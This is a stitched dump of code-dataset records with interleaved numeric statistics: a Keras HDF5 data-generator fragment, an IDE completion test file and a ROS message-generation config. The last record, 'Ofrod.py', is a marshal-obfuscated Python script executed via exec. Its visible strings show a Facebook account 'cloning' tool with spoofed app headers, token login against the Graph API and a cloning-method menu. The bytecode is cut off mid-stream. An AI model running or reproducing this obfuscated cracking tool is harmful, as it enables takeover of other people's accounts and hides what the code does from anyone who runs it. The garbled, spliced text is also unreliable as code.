valence_image_y = hdf5_file["valence_entire_train"][i_s:i_e]
# arousal_body_y = hdf5_file["arousal_cropped_train"][i_s:i_e]
arousal_image_y = hdf5_file["arousal_entire_train"][i_s:i_e]
# dominance_body_y = hdf5_file["dominance_cropped_train"][i_s:i_e]
dominance_image_y = hdf5_file["dominance_entire_train"][i_s:i_e]
elif mode == 'val':
body_x = hdf5_file["x_cropped_val"][i_s:i_e, ...]
image_x = hdf5_file["x_entire_val"][i_s:i_e, ...]
# valence_body_y = hdf5_file["valence_cropped_val"][i_s:i_e]
valence_image_y = hdf5_file["valence_entire_val"][i_s:i_e]
# arousal_body_y = hdf5_file["arousal_cropped_val"][i_s:i_e]
arousal_image_y = hdf5_file["arousal_entire_val"][i_s:i_e]
# dominance_body_y = hdf5_file["dominance_cropped_val"][i_s:i_e]
dominance_image_y = hdf5_file["dominance_entire_val"][i_s:i_e]
elif mode == 'test':
body_x = hdf5_file["x_cropped_test"][i_s:i_e, ...]
image_x = hdf5_file["x_entire_test"][i_s:i_e, ...]
# valence_body_y = hdf5_file["valence_cropped_test"][i_s:i_e]
valence_image_y = hdf5_file["valence_entire_test"][i_s:i_e]
# arousal_body_y = hdf5_file["arousal_cropped_test"][i_s:i_e]
arousal_image_y = hdf5_file["arousal_entire_test"][i_s:i_e]
# dominance_body_y = hdf5_file["dominance_cropped_test"][i_s:i_e]
dominance_image_y = hdf5_file["dominance_entire_test"][i_s:i_e]
yield [body_x,image_x], [valence_image_y,arousal_image_y,dominance_image_y]
def custom_generator_single_output(hdf5_file, nb_data, batch_size, mode):
""" Generates batches of tensor image data in form of ==> (x1, y1) ,(x2, y2).
# Reference
- https://stackoverflow.com/questions/50333532/load-images-and-annotations-from-csv-and-use-fit-generator-with-multi-output-mod
- http://machinelearninguru.com/deep_learning/data_preparation/hdf5/hdf5.html
# Arguments
hdf5_file: path or hdf5 object which contains the images and the annotations.
nb_data: total number of samples saved in the array.
batch_size: size of the batch to generate tensor image data for.
module: one of `body` or `image`.
# Returns
A generator object.
"""
batches_list = list(range(int(ceil(float(nb_data) / batch_size))))
while True:
# loop over batches
for n, i in enumerate(batches_list):
i_s = i * batch_size # index of the first image in this batch
i_e = min([(i + 1) * batch_size, nb_data]) # index of the last image in this batch
if mode == 'train':
body_x = hdf5_file["x_body_train"][i_s:i_e, ...]
image_x = hdf5_file["x_image_train"][i_s:i_e, ...]
y = hdf5_file["y_image_train"][i_s:i_e]
elif mode == 'val':
body_x = hdf5_file["x_body_val"][i_s:i_e, ...]
image_x = hdf5_file["x_image_val"][i_s:i_e, ...]
y = hdf5_file["y_image_val"][i_s:i_e]
elif mode == 'test':
body_x = hdf5_file["x_body_test"][i_s:i_e, ...]
image_x = hdf5_file["x_image_test"][i_s:i_e, ...]
y = hdf5_file["y_image_test"][i_s:i_e]
yield [body_x, image_x], y
| 47.327103
| 139
| 0.594194
| 733
| 5,064
| 3.748977
| 0.141883
| 0.107715
| 0.03821
| 0.048035
| 0.945051
| 0.945051
| 0.902475
| 0.902475
| 0.902475
| 0.881732
| 0
| 0.019252
| 0.292259
| 5,064
| 107
| 140
| 47.327103
| 0.747489
| 0.388033
| 0
| 0.355556
| 1
| 0
| 0.135742
| 0.015082
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37a84a129d4aa24dad330ed70cd5a65f7d5208dc
| 190
|
py
|
Python
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def some_fun(some_param):
some_var_1 = 22
some_var_2 = 23
some_var_1 = 22
some_var_2 = 23
SOME_VAR_3 = 24
print(<caret>)
def some_fun_2(some_param):
some_var_1 = 22
some_var_2 = 23
| 15.833333
| 27
| 0.726316
| 41
| 190
| 2.902439
| 0.317073
| 0.411765
| 0.201681
| 0.252101
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0
| 0.141935
| 0.184211
| 190
| 12
| 28
| 15.833333
| 0.625806
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
80cf1d9cc3750da216c86b9e31151688f75f2166
| 1,339
|
py
|
Python
|
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/workspace/src/ros_control/controller_manager_msgs/msg/ControllerState.msg;/workspace/src/ros_control/controller_manager_msgs/msg/ControllerStatistics.msg;/workspace/src/ros_control/controller_manager_msgs/msg/ControllersStatistics.msg;/workspace/src/ros_control/controller_manager_msgs/msg/HardwareInterfaceResources.msg"
services_str = "/workspace/src/ros_control/controller_manager_msgs/srv/ListControllerTypes.srv;/workspace/src/ros_control/controller_manager_msgs/srv/ListControllers.srv;/workspace/src/ros_control/controller_manager_msgs/srv/LoadController.srv;/workspace/src/ros_control/controller_manager_msgs/srv/ReloadControllerLibraries.srv;/workspace/src/ros_control/controller_manager_msgs/srv/SwitchController.srv;/workspace/src/ros_control/controller_manager_msgs/srv/UnloadController.srv"
pkg_name = "controller_manager_msgs"
dependencies_str = "std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "controller_manager_msgs;/workspace/src/ros_control/controller_manager_msgs/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 111.583333
| 481
| 0.855863
| 179
| 1,339
| 6.089385
| 0.329609
| 0.202752
| 0.250459
| 0.222018
| 0.491743
| 0.491743
| 0.491743
| 0.491743
| 0.359633
| 0
| 0
| 0.000766
| 0.025392
| 1,339
| 11
| 482
| 121.727273
| 0.834483
| 0.036594
| 0
| 0
| 1
| 0.333333
| 0.842391
| 0.817547
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
80d213377b292e640046d4ebd0e3f1da7b67fb03
| 66,279
|
py
|
Python
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#Compiled By Raka Andrian
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sp\x03\x00\x00y\xb0\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01Wn+\x00\x04e\x0f\x00k\n\x00r\xdd\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xe\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x06\x00\x83\x01\x00s\r\x01e\x00\x00j\x10\x00d\x07\x00\x83\x01\x00\x01n\x00\x00e\x00\x00j\x11\x00j\x12\x00d\x08\x00\x83\x01\x00s/\x01e\x00\x00j\x10\x00d\t\x00\x83\x01\x00\x01n\x00\x00d\x00\x00d\n\x00l\x13\x00m\x14\x00Z\x14\x00\x01e\x00\x00j\x10\x00d\x0b\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00s\xc1\x01e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0f\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x12\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01nh\x00e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00r)\x02e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x14\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01n\x00\x00e\x05\x00j\x16\x00d\x15\x00d\x16\x00\x83\x02\x00Z\x17\x00e\x05\x00j\x16\x00d\x17\x00d\x18\x00\x83\x02\x00Z\x18\x00i\x08\x00e\x19\x00e\x17\x00\x83\x01\x00d\x19\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1a\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006d"\x00d#\x006d$\x00d%\x006Z\x1a\x00e\x1b\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1c\x00d&\x00\x83\x01\x00\x01d\'\x00Z\x1d\x00d(\x00Z\x1e\x00d)\x00Z\x1f\x00d*\x00\x84\x00\x00Z \x00d+\x00\x84\x00\x00Z!\x00d,\x00\x84\x00\x00Z"\x00d-\x00\x84\x00\x00Z#\x00d.\x00\x84\x00\x00Z$\x00d/\x00\x84\x00\x00Z%\x00d0\x00\x84\x00\x00Z&\x00d1\x00\x84\x00\x00Z\'\x00d2\x00\x84\x00\x00Z(\x00d3\x00\x84\x00\x00Z)\x00d4\x00\x84\x00\x00Z*\x00d5\x00\x84\x00\x00Z+\x00d6\x00\x84\x00\x00Z,\x00d7\x00\x84\x00\x00Z-\x00d8\x00\x84\x00\x00Z.\x00d9\x00\x84\x00\x00Z/\x00e0\x00d:\x00k\x02\x00rl\x03e!\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(;\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x15\x00\x00\x00pip2 install requestss\x0f\x00\x00\x00python2 Best.pyt\x05\x00\x00\x00clears(\x00\x00\x00/data/data/com.termux/files/usr/bin/nodes#\x00\x00\x00apt update && apt install nodejs -ys(\x00\x00\x00/data/data/com.termux/files/usr/bin/rubys)\x00\x00\x00apt install ruby -y && gem install lolcat(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionErrors\x08\x00\x00\x00git pullsG\x00\x00\x00/data/data/com.termux/files/home/hpro/...../node_modules/bytes/index.jss\x13\x00\x00\x00fuser -k 5000/tcp &t\x01\x00\x00\x00#s\x17\x00\x00\x00cd ..... && npm installs\x1b\x00\x00\x00cd ..... && node index.js &s6\x00\x00\x00\x1b[1;32mPlease Select Chrome Browser To Continue\x1b[0;97ms\t\x00\x00\x00xdg-open i\n\x00\x00\x00s@\x00\x00\x00xdg-open https://www.facebook.com/profile.php?id=100000395779504g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|Ag\x00\x00\x00\x00\x00\x88\xd3@g\x00\x00\x00\x00\x00\x88\xe3@s\x19\x00\x00\x00x-fb-connection-bandwidths\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\xbe\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines\x05\x00\x00\x00utf-8s\x07\x00\x00\x00\x1b[1;32ms\x07\x00\x00\x00\x1b[0;97ms\x07\x00\x00\x00\x1b[1;31mc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xda\x03\x00\x00echo -e "\n\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \xe2\x97\x8d\xe2\x9e\xa4 ADMIN \xe2\x84\xa2\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x97\x8d\xe2\x9e\xa4 COMUNITAS\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 GARANGAN\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 ALAY\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 INDONESIA\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x97\x8d\xe2\x9e\xa4 C.G.A.I\n\n===============================================\n\n\xe2\x97\x8d\xe2\x9e\xa4 Codded By : \xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4\n\xe2\x97\x8d\xe2\x9e\xa4 Facebook : Raka Andrian Tara\n\xe2\x97\x8d\xe2\x9e\xa4 Instagram : raka_andrian27\n\xe2\x97\x8d\xe2\x9e\xa4 Youtube : YouTube Channel Bangsat-XD\n\n===============================================" | lolcat(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo5\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s=\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHd\x05\x00GHd\x02\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR\x01\x00\x00\x00t\x00\x00\x00\x00s$\x00\x00\x00\t \x1b[1;34mClone Method Menu\x1b[0;97ms\x17\x00\x00\x00\x1b[1;96m[1] B-api (Fast)s\x14\x00\x00\x00\x1b[1;96m[2] Localhost(\x04\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x12\x00\x00\x00method_menu_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0b\x00\x00\x00method_menu7\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sR\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ns\x13\x00\x00\x00 Choose method >>> t\x01\x00\x00\x001t\x01\x00\x00\x002R\t\x00\x00\x00s\'\x00\x00\x00\t \x1b[1;35mSelect valid option \x1b[0;97m(\x04\x00\x00\x00t\t\x00\x00\x00raw_inputt\x06\x00\x00\x00b_menut\x06\x00\x00\x00l_menuR\n\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00afza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\n\x00\x00\x00A\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sI\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHd\x05\x00GHd\x06\x00GHd\x02\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\r\x00\x00\x00FB Login MenusH\x00\x00\x00\x1b[1;92m[1] \xe2\x98\x86 ENTER TOKEN \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4s\x18\x00\x00\x00\x1b[1;92m[2] ID/Pass login(\x06\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x01\x00\x00\x00ct\x02\x00\x00\x00c2t\x0c\x00\x00\x00login_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginL\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\x16\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x04\x00d\x07\x00d\x08\x00\x83\x02\x00}\x02\x00|\x02\x00j\x05\x00|\x01\x00\x83\x01\x00\x01|\x02\x00j\x06\x00\x83\x00\x00\x01yl\x00t\x07\x00j\x08\x00d\t\x00|\x01\x00\x17\x83\x01\x00}\x03\x00t\t\x00j\n\x00|\x03\x00j\x0b\x00\x83\x01\x00}\x04\x00|\x04\x00d\n\x00\x19}\x05\x00|\x05\x00j\x0c\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x06\x00d\x04\x00GHd\r\x00|\x06\x00\x17d\x0e\x00\x17GHt\r\x00j\x0e\x00d\x0f\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01WqN\x01\x04t\x10\x00t\x11\x00f\x02\x00k\n\x00r\x12\x01\x01\x01\x01d\x04\x00GHd\x10\x00GHd\x04\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01qN\x01Xn8\x00|\x00\x00d\x12\x00k\x02\x00r,\x01t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x13\x00t\x14\x00\x17d\x14\x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00Ns\x19\x00\x00\x00 Choose login method >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s!\x00\x00\x00\t \x1b[1;32mFB Token Login\x1b[0;97ms\x19\x00\x00\x00\x1b[1;95mPast token here : s\r\x00\x00\x00.fb_token.txtt\x01\x00\x00\x00ws+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00 i\x00\x00\x00\x00s\x1d\x00\x00\x00\t\x1b[1;32mToken logged in as : s\x07\x00\x00\x00\x1b[0;97mi\x03\x00\x00\x00s"\x00\x00\x00\t \x1b[1;31mToken not valid\x1b[0;97ms \x00\x00\x00\x1b[1;92mPress enter to try again R\r\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid method(\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x04\x00\x00\x00opent\x05\x00\x00\x00writet\x05\x00\x00\x00closet\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x06\x00\x00\x00rsplitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleepR\x0b\x00\x00\x00t\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrorR\x15\x00\x00\x00t\x08\x00\x00\x00login_fbR\x12\x00\x00\x00R\x13\x00\x00\x00R\x14\x00\x00\x00(\x07\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00token_st\x01\x00\x00\x00rt\x01\x00\x00\x00qR\x17\x00\x00\x00t\x02\x00\x00\x00nm(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x14\x00\x00\x00V\x00\x00\x00s@\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0f\x01\r\x01\n\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\x05\x01\r\x01\r\x01\x0b\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0e\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sw\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHt\x03\x00d\x04\x00\x83\x01\x00}\x00\x00|\x00\x00j\x04\x00d\x05\x00d\x02\x00\x83\x02\x00}\x01\x00|\x01\x00j\x04\x00d\x06\x00d\x02\x00\x83\x02\x00}\x02\x00|\x02\x00j\x04\x00d\x07\x00d\x02\x00\x83\x02\x00}\x03\x00t\x03\x00d\x08\x00\x8